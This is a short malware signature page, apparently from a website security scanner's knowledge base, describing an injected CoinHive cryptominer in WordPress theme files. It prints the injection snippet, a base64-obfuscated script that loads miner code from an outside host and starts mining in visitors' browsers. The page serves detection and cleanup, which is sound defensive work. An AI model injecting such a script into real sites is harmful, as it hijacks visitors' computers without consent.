SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.cryptominer.4

malware.cryptominer.4

Description:
Website contains an encrypted CoinHive JavaScript miner library, which usually means that it's used without webmaster's consent.

The script can be injected into header.php and footer.php of WordPress themes:

<scr ipt type='text/javascript'>$(document).ready(function() {$.getScript(atob("aHR0cHM6Ly85OW​xlYXZlLmNvbS93cC1pbmNsdWRlcy9q​cy9jZG4tanF1ZXJ5Lm1pbi5qcw=="), function(){var jqueryhelper = new CoinHive.Anonymous("SL67plLGdyPW8YmiOn8FJfHySoR5zkYh");jqueryhelper​.start();jqueryhelper.​setThrottle(0.​05);})​;});</script>

Affecting: Mostly WordPress sites.

Mitigation
How to clean a hacked WordPress site